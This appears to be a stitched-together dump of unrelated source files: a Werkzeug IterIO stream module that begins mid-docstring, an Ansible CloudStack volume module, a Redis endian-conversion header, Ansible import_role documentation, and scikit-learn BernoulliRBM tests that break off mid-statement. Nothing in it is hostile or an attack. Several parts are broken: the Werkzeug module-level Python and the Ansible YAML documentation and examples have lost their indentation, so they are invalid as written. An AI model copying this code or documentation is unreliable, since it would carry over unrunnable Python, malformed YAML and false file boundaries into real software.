iterator = IterIO(foo)
print iterator.next() # prints something
print iterator.next() # prints otherthing
iterator.next() # raises StopIteration
.. _greenlet: https://github.com/python-greenlet/greenlet
:copyright: (c) 2014 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
try:
import greenlet
except ImportError:
greenlet = None
from werkzeug._compat import implements_iterator
def _mixed_join(iterable, sentinel):
"""concatenate any string type in an intelligent way."""
iterator = iter(iterable)
first_item = next(iterator, sentinel)
if isinstance(first_item, bytes):
return first_item + b''.join(iterator)
return first_item + u''.join(iterator)
def _newline(reference_string):
if isinstance(reference_string, bytes):
return b'\n'
return u'\n'
@implements_iterator
class IterIO(object):
    """Instances of this object implement an interface compatible with the
    standard Python :class:`file` object.  Streams are either read-only or
    write-only depending on how the object is created.

    If the first argument is an iterable a file like object is returned that
    returns the contents of the iterable.  In case the iterable is empty
    read operations will return the sentinel value.

    If the first argument is a callable then the stream object will be
    created and passed to that function.  The caller itself however will
    not receive a stream but an iterable.  The function will be executed
    step by step as something iterates over the returned iterable.  Each
    call to :meth:`flush` will create an item for the iterable.  If
    :meth:`flush` is called without any writes in-between the sentinel
    value will be yielded.

    Note for Python 3: due to the incompatible interface of bytes and
    streams you should set the sentinel value explicitly to an empty
    bytestring (``b''``) if you are expecting to deal with bytes as
    otherwise the end of the stream is marked with the wrong sentinel
    value.

    .. versionadded:: 0.9
       `sentinel` parameter was added.
    """

    def __new__(cls, obj, sentinel=''):
        # Dispatch on the argument: iterables become a readable IterO,
        # non-iterables (callables) become a writable IterI.
        try:
            iterator = iter(obj)
        except TypeError:
            return IterI(obj, sentinel)
        return IterO(iterator, sentinel)

    def __iter__(self):
        return self

    def tell(self):
        if self.closed:
            raise ValueError('I/O operation on closed file')
        return self.pos

    def isatty(self):
        if self.closed:
            raise ValueError('I/O operation on closed file')
        return False

    # The remaining methods are default stubs that raise EBADF ("Bad file
    # descriptor"); each subclass overrides the side of the interface
    # (reading or writing) that it actually supports.
    def seek(self, pos, mode=0):
        if self.closed:
            raise ValueError('I/O operation on closed file')
        raise IOError(9, 'Bad file descriptor')

    def truncate(self, size=None):
        if self.closed:
            raise ValueError('I/O operation on closed file')
        raise IOError(9, 'Bad file descriptor')

    def write(self, s):
        if self.closed:
            raise ValueError('I/O operation on closed file')
        raise IOError(9, 'Bad file descriptor')

    def writelines(self, list):
        if self.closed:
            raise ValueError('I/O operation on closed file')
        raise IOError(9, 'Bad file descriptor')

    def read(self, n=-1):
        if self.closed:
            raise ValueError('I/O operation on closed file')
        raise IOError(9, 'Bad file descriptor')

    def readlines(self, sizehint=0):
        if self.closed:
            raise ValueError('I/O operation on closed file')
        raise IOError(9, 'Bad file descriptor')

    def readline(self, length=None):
        if self.closed:
            raise ValueError('I/O operation on closed file')
        raise IOError(9, 'Bad file descriptor')

    def flush(self):
        if self.closed:
            raise ValueError('I/O operation on closed file')
        raise IOError(9, 'Bad file descriptor')

    def __next__(self):
        if self.closed:
            raise StopIteration()
        line = self.readline()
        if not line:
            raise StopIteration()
        return line
class IterI(IterIO):
    """Convert an stream into an iterator."""

    def __new__(cls, func, sentinel=''):
        # NOTE: this __new__ contains ``yield`` and is therefore a generator
        # function -- "instantiating" IterI returns a generator, not a
        # stream. The actual stream object is built here and handed to
        # *func*, which runs inside a greenlet so it can be suspended at
        # every flush().
        if greenlet is None:
            raise RuntimeError('IterI requires greenlet support')
        stream = object.__new__(cls)
        stream._parent = greenlet.getcurrent()
        stream._buffer = []
        stream.closed = False
        stream.sentinel = sentinel
        stream.pos = 0

        def run():
            func(stream)
            stream.close()

        g = greenlet.greenlet(run, stream._parent)
        while 1:
            # Resume the writer; it switches back with a 1-tuple of data on
            # each flush, or with no value once finished.
            rv = g.switch()
            if not rv:
                return
            yield rv[0]

    def close(self):
        if not self.closed:
            self.closed = True
            self._flush_impl()

    def write(self, s):
        if self.closed:
            raise ValueError('I/O operation on closed file')
        if s:
            self.pos += len(s)
            self._buffer.append(s)

    def writelines(self, list):
        for item in list:
            self.write(item)

    def flush(self):
        if self.closed:
            raise ValueError('I/O operation on closed file')
        self._flush_impl()

    def _flush_impl(self):
        # Join whatever has been buffered and hand it to the consumer by
        # switching back to the parent greenlet.
        data = _mixed_join(self._buffer, self.sentinel)
        self._buffer = []
        if not data and self.closed:
            # Nothing buffered and we are done: switch back without a value
            # so the generator loop in __new__ terminates.
            self._parent.switch()
        else:
            self._parent.switch((data,))
class IterO(IterIO):
    """Iter output.  Wrap an iterator and give it a stream like interface."""

    def __new__(cls, gen, sentinel=''):
        # Plain object construction. ``_buf`` holds everything pulled from
        # the generator so far (None until first use) and ``pos`` is the
        # virtual read position inside that concatenated data.
        self = object.__new__(cls)
        self._gen = gen
        self._buf = None
        self.sentinel = sentinel
        self.closed = False
        self.pos = 0
        return self

    def __iter__(self):
        return self

    def _buf_append(self, string):
        '''Replace string directly without appending to an empty string,
        avoiding type issues.'''
        if not self._buf:
            self._buf = string
        else:
            self._buf += string

    def close(self):
        if not self.closed:
            self.closed = True
            if hasattr(self._gen, 'close'):
                self._gen.close()

    def seek(self, pos, mode=0):
        """Seek within the data; forward seeks may consume the generator."""
        if self.closed:
            raise ValueError('I/O operation on closed file')
        if mode == 1:
            # Relative seek: offset from the current position.
            pos += self.pos
        elif mode == 2:
            # Seek from the end: exhaust the generator so the total length
            # is known, then clamp.
            self.read()
            self.pos = min(self.pos, self.pos + pos)
            return
        elif mode != 0:
            raise IOError('Invalid argument')
        buf = []
        try:
            # NOTE(review): this assumes _buf is already a string here; a
            # mode-0/1 seek before any read (while _buf is still None) would
            # raise TypeError on len(None) -- confirm intended.
            tmp_end_pos = len(self._buf)
            while pos > tmp_end_pos:
                item = next(self._gen)
                tmp_end_pos += len(item)
                buf.append(item)
        except StopIteration:
            pass
        if buf:
            self._buf_append(_mixed_join(buf, self.sentinel))
        self.pos = max(0, pos)

    def read(self, n=-1):
        """Read up to *n* items' worth of data (everything when *n* < 0)."""
        if self.closed:
            raise ValueError('I/O operation on closed file')
        if n < 0:
            # Drain the generator entirely and return the rest of the data.
            self._buf_append(_mixed_join(self._gen, self.sentinel))
            result = self._buf[self.pos:]
            self.pos += len(result)
            return result
        new_pos = self.pos + n
        buf = []
        try:
            # Pull from the generator until enough data is buffered to
            # satisfy the request (or the generator is exhausted).
            tmp_end_pos = 0 if self._buf is None else len(self._buf)
            while new_pos > tmp_end_pos or (self._buf is None and not buf):
                item = next(self._gen)
                tmp_end_pos += len(item)
                buf.append(item)
        except StopIteration:
            pass
        if buf:
            self._buf_append(_mixed_join(buf, self.sentinel))

        if self._buf is None:
            return self.sentinel

        new_pos = max(0, new_pos)
        try:
            return self._buf[self.pos:new_pos]
        finally:
            self.pos = min(new_pos, len(self._buf))

    def readline(self, length=None):
        """Read until (and including) the next newline, or at most *length*."""
        if self.closed:
            raise ValueError('I/O operation on closed file')

        # First look for a newline in the data already buffered.
        nl_pos = -1
        if self._buf:
            nl_pos = self._buf.find(_newline(self._buf), self.pos)
        buf = []
        try:
            if self._buf is None:
                pos = self.pos
            else:
                pos = len(self._buf)
            while nl_pos < 0:
                item = next(self._gen)
                local_pos = item.find(_newline(item))
                buf.append(item)
                if local_pos >= 0:
                    nl_pos = pos + local_pos
                    break
                pos += len(item)
        except StopIteration:
            pass
        if buf:
            self._buf_append(_mixed_join(buf, self.sentinel))

        if self._buf is None:
            return self.sentinel

        if nl_pos < 0:
            new_pos = len(self._buf)
        else:
            new_pos = nl_pos + 1

        if length is not None and self.pos + length < new_pos:
            new_pos = self.pos + length
        try:
            return self._buf[self.pos:new_pos]
        finally:
            self.pos = min(new_pos, len(self._buf))

    def readlines(self, sizehint=0):
        """Collect lines until EOF, or until *sizehint* bytes are exceeded."""
        total = 0
        lines = []
        line = self.readline()
        while line:
            lines.append(line)
            total += len(line)
            if 0 < sizehint <= total:
                break
            line = self.readline()
        return lines
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2015, Jefferson Girão <jefferson@girao.net>
# (c) 2015, René Moser <mail@renemoser.net>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Module metadata consumed by Ansible's documentation and QA tooling.
ANSIBLE_METADATA = {'metadata_version': '1.1',
                    'status': ['stableinterface'],
                    'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cs_volume
short_description: Manages volumes on Apache CloudStack based clouds.
description:
- Create, destroy, attach, detach volumes.
version_added: "2.1"
author:
- "Jefferson Girão (@jeffersongirao)"
- "René Moser (@resmo)"
options:
name:
description:
- Name of the volume.
- C(name) can only contain ASCII letters.
required: true
account:
description:
- Account the volume is related to.
custom_id:
description:
- Custom id to the resource.
- Allowed to Root Admins only.
disk_offering:
description:
- Name of the disk offering to be used.
- Required one of C(disk_offering), C(snapshot) if volume is not already C(state=present).
display_volume:
description:
- Whether to display the volume to the end user or not.
- Allowed to Root Admins only.
default: true
domain:
description:
- Name of the domain the volume to be deployed in.
max_iops:
description:
- Max iops
min_iops:
description:
- Min iops
project:
description:
- Name of the project the volume to be deployed in.
size:
description:
- Size of disk in GB
snapshot:
description:
- The snapshot name for the disk volume.
- Required one of C(disk_offering), C(snapshot) if volume is not already C(state=present).
force:
description:
      - Force removal of volume even if it is attached to a VM.
      - Considered on C(state=absent) only.
default: false
shrink_ok:
description:
- Whether to allow to shrink the volume.
default: false
vm:
description:
- Name of the virtual machine to attach the volume to.
zone:
description:
- Name of the zone in which the volume should be deployed.
- If not set, default zone is used.
state:
description:
- State of the volume.
default: present
choices: [ present, absent, attached, detached ]
poll_async:
description:
- Poll async jobs until job has finished.
default: true
tags:
description:
- List of tags. Tags are a list of dictionaries having keys C(key) and C(value).
      - "To delete all tags, set an empty list e.g. C(tags: [])."
aliases: [ 'tag' ]
version_added: "2.4"
extends_documentation_fragment: cloudstack
'''
EXAMPLES = '''
- name: create volume within project and zone with specified storage options
local_action:
module: cs_volume
name: web-vm-1-volume
project: Integration
zone: ch-zrh-ix-01
disk_offering: PerfPlus Storage
size: 20
- name: create/attach volume to instance
local_action:
module: cs_volume
name: web-vm-1-volume
disk_offering: PerfPlus Storage
size: 20
vm: web-vm-1
state: attached
- name: detach volume
local_action:
module: cs_volume
name: web-vm-1-volume
state: detached
- name: remove volume
local_action:
module: cs_volume
name: web-vm-1-volume
state: absent
'''
RETURN = '''
id:
description: ID of the volume.
returned: success
type: string
sample:
name:
description: Name of the volume.
returned: success
type: string
sample: web-volume-01
display_name:
description: Display name of the volume.
returned: success
type: string
sample: web-volume-01
group:
description: Group the volume belongs to
returned: success
type: string
sample: web
domain:
description: Domain the volume belongs to
returned: success
type: string
sample: example domain
project:
description: Project the volume belongs to
returned: success
type: string
sample: Production
zone:
description: Name of zone the volume is in.
returned: success
type: string
sample: ch-gva-2
created:
  description: Date the volume was created.
returned: success
type: string
sample: 2014-12-01T14:57:57+0100
attached:
  description: Date the volume was attached.
returned: success
type: string
sample: 2014-12-01T14:57:57+0100
type:
description: Disk volume type.
returned: success
type: string
sample: DATADISK
size:
description: Size of disk volume.
returned: success
type: string
sample: 20
vm:
description: Name of the vm the volume is attached to (not returned when detached)
returned: success
type: string
sample: web-01
state:
description: State of the volume
returned: success
type: string
sample: Attached
device_id:
description: Id of the device on user vm the volume is attached to (not returned when detached)
returned: success
type: string
sample: 1
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.cloudstack import (
AnsibleCloudStack,
cs_required_together,
cs_argument_spec
)
class AnsibleCloudStackVolume(AnsibleCloudStack):
    """Create, resize, attach, detach and delete CloudStack data volumes.

    NOTE(review): relies on helpers inherited from AnsibleCloudStack
    (query_api, get_account, poll_job, ensure_tags, ...) defined outside
    this file.
    """

    def __init__(self, module):
        super(AnsibleCloudStackVolume, self).__init__(module)
        # Maps CloudStack API result keys to this module's return-value keys.
        self.returns = {
            'group': 'group',
            'attached': 'attached',
            'vmname': 'vm',
            'deviceid': 'device_id',
            'type': 'type',
            'size': 'size',
        }
        # Cache for the looked-up/created volume dict.
        self.volume = None

    def get_volume(self):
        """Return the DATADISK volume matching params['name'], or None (cached)."""
        if not self.volume:
            args = {
                'account': self.get_account(key='name'),
                'domainid': self.get_domain(key='id'),
                'projectid': self.get_project(key='id'),
                'zoneid': self.get_zone(key='id'),
                'displayvolume': self.module.params.get('display_volume'),
                'type': 'DATADISK',
                'fetch_list': True,
            }
            volumes = self.query_api('listVolumes', **args)
            if volumes:
                volume_name = self.module.params.get('name')
                # Volume names are compared case-insensitively.
                for v in volumes:
                    if volume_name.lower() == v['name'].lower():
                        self.volume = v
                        break
        return self.volume

    def get_snapshot(self, key=None):
        """Resolve the 'snapshot' param to a snapshot dict (or one field of it).

        Returns None when no snapshot was requested; fails the module when
        the named snapshot does not exist.
        """
        snapshot = self.module.params.get('snapshot')
        if not snapshot:
            return None
        args = {
            'name': snapshot,
            'account': self.get_account('name'),
            'domainid': self.get_domain('id'),
            'projectid': self.get_project('id'),
        }
        snapshots = self.query_api('listSnapshots', **args)
        if snapshots:
            return self._get_by_key(key, snapshots['snapshot'][0])
        self.module.fail_json(msg="Snapshot with name %s not found" % snapshot)

    def present_volume(self):
        """Ensure the volume exists: update it if found, otherwise create it."""
        volume = self.get_volume()
        if volume:
            volume = self.update_volume(volume)
        else:
            # A new volume must come from either a disk offering or a snapshot.
            disk_offering_id = self.get_disk_offering(key='id')
            snapshot_id = self.get_snapshot(key='id')
            if not disk_offering_id and not snapshot_id:
                self.module.fail_json(msg="Required one of: disk_offering,snapshot")
            self.result['changed'] = True
            args = {
                'name': self.module.params.get('name'),
                'account': self.get_account(key='name'),
                'domainid': self.get_domain(key='id'),
                'diskofferingid': disk_offering_id,
                'displayvolume': self.module.params.get('display_volume'),
                'maxiops': self.module.params.get('max_iops'),
                'miniops': self.module.params.get('min_iops'),
                'projectid': self.get_project(key='id'),
                'size': self.module.params.get('size'),
                'snapshotid': snapshot_id,
                'zoneid': self.get_zone(key='id')
            }
            if not self.module.check_mode:
                res = self.query_api('createVolume', **args)
                if 'errortext' in res:
                    self.module.fail_json(msg="Failed: '%s'" % res['errortext'])
                poll_async = self.module.params.get('poll_async')
                if poll_async:
                    volume = self.poll_job(res, 'volume')
        if volume:
            # Reconcile tags on the existing or newly created volume.
            volume = self.ensure_tags(resource=volume, resource_type='Volume')
            self.volume = volume
        return volume

    def attached_volume(self):
        """Ensure the volume exists and is attached to the requested VM."""
        volume = self.present_volume()
        if volume:
            if volume.get('virtualmachineid') != self.get_vm(key='id'):
                # Attached to a different VM: detach before re-attaching.
                self.result['changed'] = True
                if not self.module.check_mode:
                    volume = self.detached_volume()
            if 'attached' not in volume:
                self.result['changed'] = True
                args = {
                    'id': volume['id'],
                    'virtualmachineid': self.get_vm(key='id'),
                    'deviceid': self.module.params.get('device_id'),
                }
                if not self.module.check_mode:
                    res = self.query_api('attachVolume', **args)
                    poll_async = self.module.params.get('poll_async')
                    if poll_async:
                        volume = self.poll_job(res, 'volume')
        return volume

    def detached_volume(self):
        """Ensure the volume exists and is not attached to any VM."""
        volume = self.present_volume()
        if volume:
            if 'attached' not in volume:
                # Already detached; nothing to do.
                return volume
            self.result['changed'] = True
            if not self.module.check_mode:
                res = self.query_api('detachVolume', id=volume['id'])
                poll_async = self.module.params.get('poll_async')
                if poll_async:
                    volume = self.poll_job(res, 'volume')
        return volume

    def absent_volume(self):
        """Delete the volume; refuses when attached unless force=true."""
        volume = self.get_volume()
        if volume:
            if 'attached' in volume and not self.module.params.get('force'):
                self.module.fail_json(msg="Volume '%s' is attached, use force=true for detaching and removing the volume." % volume.get('name'))
            self.result['changed'] = True
            if not self.module.check_mode:
                # Detach first (no-op when already detached), then delete.
                volume = self.detached_volume()
                res = self.query_api('deleteVolume', id=volume['id'])
                poll_async = self.module.params.get('poll_async')
                if poll_async:
                    self.poll_job(res, 'volume')
        return volume

    def update_volume(self, volume):
        """Resize the volume when offering/iops/size params differ from it."""
        args_resize = {
            'id': volume['id'],
            'diskofferingid': self.get_disk_offering(key='id'),
            'maxiops': self.module.params.get('max_iops'),
            'miniops': self.module.params.get('min_iops'),
            'size': self.module.params.get('size')
        }
        # change unit from bytes to giga bytes to compare with args
        volume_copy = volume.copy()
        # NOTE(review): under Python 3 this is true (float) division;
        # presumably API sizes are exact GiB multiples — confirm has_changed
        # compares this as intended.
        volume_copy['size'] = volume_copy['size'] / (2**30)
        if self.has_changed(args_resize, volume_copy):
            self.result['changed'] = True
            if not self.module.check_mode:
                args_resize['shrinkok'] = self.module.params.get('shrink_ok')
                res = self.query_api('resizeVolume', **args_resize)
                poll_async = self.module.params.get('poll_async')
                if poll_async:
                    volume = self.poll_job(res, 'volume')
                self.volume = volume
        return volume
def main():
    """Module entry point: build the argument spec and dispatch on 'state'."""
    argument_spec = cs_argument_spec()
    argument_spec.update(dict(
        name=dict(required=True),
        disk_offering=dict(),
        display_volume=dict(type='bool'),
        max_iops=dict(type='int'),
        min_iops=dict(type='int'),
        size=dict(type='int'),
        snapshot=dict(),
        vm=dict(),
        device_id=dict(type='int'),
        custom_id=dict(),
        force=dict(type='bool', default=False),
        shrink_ok=dict(type='bool', default=False),
        state=dict(choices=['present', 'absent', 'attached', 'detached'], default='present'),
        zone=dict(),
        domain=dict(),
        account=dict(),
        project=dict(),
        poll_async=dict(type='bool', default=True),
        tags=dict(type='list', aliases=['tag']),
    ))

    module = AnsibleModule(
        argument_spec=argument_spec,
        required_together=cs_required_together(),
        mutually_exclusive=(
            ['snapshot', 'disk_offering'],
        ),
        supports_check_mode=True
    )

    acs_vol = AnsibleCloudStackVolume(module)

    # Map each requested state onto the handler method that enforces it;
    # 'state' is restricted to these four values by the argument spec.
    handlers = {
        'absent': acs_vol.absent_volume,
        'attached': acs_vol.attached_volume,
        'detached': acs_vol.detached_volume,
        'present': acs_vol.present_volume,
    }
    volume = handlers[module.params.get('state')]()

    module.exit_json(**acs_vol.get_result(volume))


if __name__ == '__main__':
    main()
/* See endianconv.c top comments for more information
*
* ----------------------------------------------------------------------------
*
* Copyright (c) 2011-Present, Redis Ltd.
* All rights reserved.
*
* Licensed under your choice of (a) the Redis Source Available License 2.0
* (RSALv2); or (b) the Server Side Public License v1 (SSPLv1); or (c) the
* GNU Affero General Public License v3 (AGPLv3).
*/
#ifndef __ENDIANCONV_H
#define __ENDIANCONV_H
#include "config.h"
#include <stdint.h>
/* --------------------------------------------------------------------------
 * Optimized endian conversion helpers
 * -------------------------------------------------------------------------- */

/* For GCC, Clang — use builtins that compile to a single instruction */
#if defined(__GNUC__) || defined(__clang__)
#define REDIS_BSWAP64(v) __builtin_bswap64(v)
#else
/* Portable fallback: byte-swap through the C function declared below. */
#define REDIS_BSWAP64(v) intrev64(v)
#endif

/* In-place byte reversal of the 16/32/64-bit value stored at p. */
void memrev16(void *p);
void memrev32(void *p);
void memrev64(void *p);
/* Value-returning byte reversal of a 16/32/64-bit integer. */
uint16_t intrev16(uint16_t v);
uint32_t intrev32(uint32_t v);
uint64_t intrev64(uint64_t v);

/* variants of the function doing the actual conversion only if the target
 * host is big endian */
#if (BYTE_ORDER == LITTLE_ENDIAN)
/* Little-endian host: all conversions are no-ops. */
#define memrev16ifbe(p) ((void)(0))
#define memrev32ifbe(p) ((void)(0))
#define memrev64ifbe(p) ((void)(0))
#define intrev16ifbe(v) (v)
#define intrev32ifbe(v) (v)
#define intrev64ifbe(v) (v)
#else
#define memrev16ifbe(p) memrev16(p)
#define memrev32ifbe(p) memrev32(p)
#define memrev64ifbe(p) memrev64(p)
#define intrev16ifbe(v) intrev16(v)
#define intrev32ifbe(v) intrev32(v)
#define intrev64ifbe(v) intrev64(v)
#endif

/* The functions htonu64() and ntohu64() convert the specified value to
 * network byte ordering and back. In big endian systems they are no-ops. */
#if (BYTE_ORDER == BIG_ENDIAN)
#define htonu64(v) (v)
#define ntohu64(v) (v)
#else
#define htonu64(v) REDIS_BSWAP64(v)
#define ntohu64(v) REDIS_BSWAP64(v)
#endif

#ifdef REDIS_TEST
int endianconvTest(int argc, char *argv[], int flags);
#endif
#endif | c | github | https://github.com/redis/redis | src/endianconv.h |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
# Module metadata consumed by Ansible's documentation and QA tooling.
ANSIBLE_METADATA = {
    'metadata_version': '1.1',
    'status': ['preview'],
    'supported_by': 'core'
}
DOCUMENTATION = '''
---
author: Ansible Core Team (@ansible)
module: import_role
short_description: Import a role into a play
description:
  - Much like the `roles:` keyword, this task loads a role, but it allows you to control when the role tasks run, in
    between other tasks of the play.
- Most keywords, loops and conditionals will only be applied to the imported tasks, not to this statement itself. If
you want the opposite behavior, use M(include_role) instead. To better understand the difference you can read
the L(Including and Importing Guide,../user_guide/playbooks_reuse_includes.html).
version_added: "2.4"
options:
name:
description:
- The name of the role to be executed.
required: True
tasks_from:
description:
- File to load from a role's C(tasks/) directory.
default: main
vars_from:
description:
- File to load from a role's C(vars/) directory.
default: main
defaults_from:
description:
- File to load from a role's C(defaults/) directory.
default: main
allow_duplicates:
description:
- Overrides the role's metadata setting to allow using a role more than once with the same parameters.
type: bool
default: 'yes'
notes:
- Handlers are made available to the whole play.
- "Since Ansible 2.7: variables defined in C(vars) and C(defaults) for the role are exposed at playbook parsing time.
Due to this, these variables will be accessible to roles and tasks executed before the location of the
C(import_role) task."
- Unlike C(include_role) variable exposure is not configurable, and will always be exposed.
'''
EXAMPLES = """
- hosts: all
tasks:
- import_role:
name: myrole
- name: Run tasks/other.yaml instead of 'main'
import_role:
name: myrole
tasks_from: other
- name: Pass variables to role
import_role:
name: myrole
vars:
rolevar1: value from task
- name: Apply condition to each task in role
import_role:
name: myrole
when: not idontwanttorun
"""
RETURN = """
# This module does not return anything except tasks to execute.
""" | unknown | codeparrot/codeparrot-clean | ||
import re
import sys
from io import StringIO
import numpy as np
import pytest
from sklearn.datasets import load_digits
from sklearn.neural_network import BernoulliRBM
from sklearn.utils._testing import (
assert_allclose,
assert_almost_equal,
assert_array_equal,
)
from sklearn.utils.fixes import CSC_CONTAINERS, CSR_CONTAINERS, LIL_CONTAINERS
from sklearn.utils.validation import assert_all_finite
# Shared fixture: the digits dataset scaled into [0, 1] so pixel values can
# act as Bernoulli probabilities for the RBM's visible units.
Xdigits, _ = load_digits(return_X_y=True)
Xdigits -= Xdigits.min()
Xdigits /= Xdigits.max()
def test_fit():
    # Fit on a copy so we can verify afterwards that fitting did not
    # modify the caller's input array in place.
    X = Xdigits.copy()
    model = BernoulliRBM(
        n_components=64, learning_rate=0.1, batch_size=10, n_iter=7, random_state=9
    )
    model.fit(X)
    assert_almost_equal(model.score_samples(X).mean(), -21.0, decimal=0)
    assert_array_equal(X, Xdigits)
def test_partial_fit():
    # Seven epochs of partial_fit over mini-batches should reach the same
    # pseudo-likelihood as a regular fit, without mutating the input.
    X = Xdigits.copy()
    model = BernoulliRBM(
        n_components=64, learning_rate=0.1, batch_size=20, random_state=9
    )
    n_batches = int(np.ceil(float(X.shape[0]) / model.batch_size))
    for _ in range(7):
        for chunk in np.array_split(X, n_batches):
            model.partial_fit(chunk)
    assert_almost_equal(model.score_samples(X).mean(), -21.0, decimal=0)
    assert_array_equal(X, Xdigits)
def test_transform():
    # transform() is defined as the mean activation of the hidden units.
    X = Xdigits[:100]
    model = BernoulliRBM(n_components=16, batch_size=5, n_iter=5, random_state=42)
    model.fit(X)
    assert_array_equal(model.transform(X), model._mean_hiddens(X))
@pytest.mark.parametrize("csr_container", CSR_CONTAINERS)
def test_small_sparse(csr_container):
    # Fitting a tiny sparse matrix must not raise.
    BernoulliRBM().fit(csr_container(Xdigits[:4]))
@pytest.mark.parametrize("sparse_container", CSC_CONTAINERS + CSR_CONTAINERS)
def test_small_sparse_partial_fit(sparse_container):
    # partial_fit should produce equivalent models on sparse and dense input.
    X_dense = Xdigits[:100].copy()
    X_sparse = sparse_container(Xdigits[:100])
    sparse_model = BernoulliRBM(
        n_components=64, learning_rate=0.1, batch_size=10, random_state=9
    )
    dense_model = BernoulliRBM(
        n_components=64, learning_rate=0.1, batch_size=10, random_state=9
    )
    sparse_model.partial_fit(X_sparse)
    dense_model.partial_fit(X_dense)
    assert_almost_equal(
        sparse_model.score_samples(X_dense).mean(),
        dense_model.score_samples(X_dense).mean(),
        decimal=0,
    )
def test_sample_hiddens():
    # The empirical mean of many sampled hidden states should approximate
    # the analytic hidden-unit mean.
    rng = np.random.RandomState(0)
    X = Xdigits[:100]
    model = BernoulliRBM(n_components=2, batch_size=5, n_iter=5, random_state=42)
    model.fit(X)
    analytic_mean = model._mean_hiddens(X[0])
    empirical_mean = np.mean(
        [model._sample_hiddens(X[0], rng) for _ in range(100)], 0
    )
    assert_almost_equal(analytic_mean, empirical_mean, decimal=1)
@pytest.mark.parametrize("csc_container", CSC_CONTAINERS)
def test_fit_gibbs(csc_container):
    # XXX: this test is very seed-dependent! It probably needs to be rewritten.
    # Gibbs on the RBM hidden layer should be able to recreate [[0], [1]]
    # from the same input
    rng = np.random.RandomState(42)
    X = np.array([[0.0], [1.0]])
    rbm1 = BernoulliRBM(n_components=2, batch_size=2, n_iter=42, random_state=rng)
    # you need that much iters
    rbm1.fit(X)
    assert_almost_equal(
        rbm1.components_, np.array([[0.02649814], [0.02009084]]), decimal=4
    )
    assert_almost_equal(rbm1.gibbs(X), X)
    # Gibbs on the RBM hidden layer should be able to recreate [[0], [1]] from
    # the same input even when the input is sparse, and test against non-sparse
    # A fresh RNG with the same seed keeps dense and sparse runs comparable.
    rng = np.random.RandomState(42)
    X = csc_container([[0.0], [1.0]])
    rbm2 = BernoulliRBM(n_components=2, batch_size=2, n_iter=42, random_state=rng)
    rbm2.fit(X)
    assert_almost_equal(
        rbm2.components_, np.array([[0.02649814], [0.02009084]]), decimal=4
    )
    assert_almost_equal(rbm2.gibbs(X), X.toarray())
    assert_almost_equal(rbm1.components_, rbm2.components_)
def test_gibbs_smoke():
    # Sampling the full digits dataset must stay finite, and two
    # consecutive Gibbs passes must not return identical samples.
    model = BernoulliRBM(n_components=42, batch_size=40, n_iter=20, random_state=42)
    model.fit(Xdigits)
    first_pass = model.gibbs(Xdigits)
    assert_all_finite(first_pass)
    second_pass = model.gibbs(Xdigits)
    assert np.all((first_pass != second_pass).max(axis=1))
@pytest.mark.parametrize("lil_containers", LIL_CONTAINERS)
def test_score_samples(lil_containers):
    # Test score_samples (pseudo-likelihood) method.
    # Assert that pseudo-likelihood is computed without clipping.
    # See Fabian's blog, http://bit.ly/1iYefRk
    rng = np.random.RandomState(42)
    X = np.vstack([np.zeros(1000), np.ones(1000)])
    rbm1 = BernoulliRBM(n_components=10, batch_size=2, n_iter=10, random_state=rng)
    rbm1.fit(X)
    assert (rbm1.score_samples(X) < -300).all()
    # Sparse vs. dense should not affect the output. Also test sparse input
    # validation.
    # Reset the seed before each call so both scores draw identical randomness.
    rbm1.random_state = 42
    d_score = rbm1.score_samples(X)
    rbm1.random_state = 42
    s_score = rbm1.score_samples(lil_containers(X))
    assert_almost_equal(d_score, s_score)
    # Test numerical stability (#2785): would previously generate infinities
    # and crash with an exception.
    with np.errstate(under="ignore"):
        rbm1.score_samples([np.arange(1000) * 100])
@pytest.mark.thread_unsafe  # manually captured stdout
def test_rbm_verbose():
    # Smoke test: verbose fitting must not raise; swallow its output.
    verbose_model = BernoulliRBM(n_iter=2, verbose=10)
    saved_stdout = sys.stdout
    sys.stdout = StringIO()
    try:
        verbose_model.fit(Xdigits)
    finally:
        sys.stdout = saved_stdout
@pytest.mark.parametrize("csc_container", CSC_CONTAINERS)
def test_sparse_and_verbose(csc_container, capsys):
    # Verbose fitting on sparse input must work and print a sane report.
    model = BernoulliRBM(
        n_components=2, batch_size=2, n_iter=1, random_state=42, verbose=True
    )
    model.fit(csc_container([[0.0], [1.0]]))
    expected_report = (
        r"\[BernoulliRBM\] Iteration 1,"
        r" pseudo-likelihood = -?(\d)+(\.\d+)?,"
        r" time = (\d|\.)+s"
    )
    assert re.match(expected_report, capsys.readouterr().out)
@pytest.mark.parametrize(
    "dtype_in, dtype_out",
    [(np.float32, np.float32), (np.float64, np.float64), (int, np.float64)],
)
def test_transformer_dtypes_casting(dtype_in, dtype_out):
    # The output dtype must track the input dtype (ints promoted to float64).
    X = Xdigits[:100].astype(dtype_in)
    model = BernoulliRBM(n_components=16, batch_size=5, n_iter=5, random_state=42)
    Xt = model.fit_transform(X)
    assert Xt.dtype == dtype_out, "transform dtype: {} - original dtype: {}".format(
        Xt.dtype, X.dtype
    )
def test_convergence_dtype_consistency():
    # Fit identical models on float64 and float32 data, then check that
    # transformed output and fitted attributes agree within tolerance.
    transformed = {}
    fitted = {}
    for dtype in (np.float64, np.float32):
        model = BernoulliRBM(n_components=16, batch_size=5, n_iter=5, random_state=42)
        transformed[dtype] = model.fit_transform(Xdigits[:100].astype(dtype))
        fitted[dtype] = model
    rbm_64 = fitted[np.float64]
    rbm_32 = fitted[np.float32]
    assert_allclose(
        transformed[np.float64], transformed[np.float32], rtol=1e-06, atol=0
    )
    assert_allclose(
        rbm_64.intercept_hidden_, rbm_32.intercept_hidden_, rtol=1e-06, atol=0
    )
    assert_allclose(
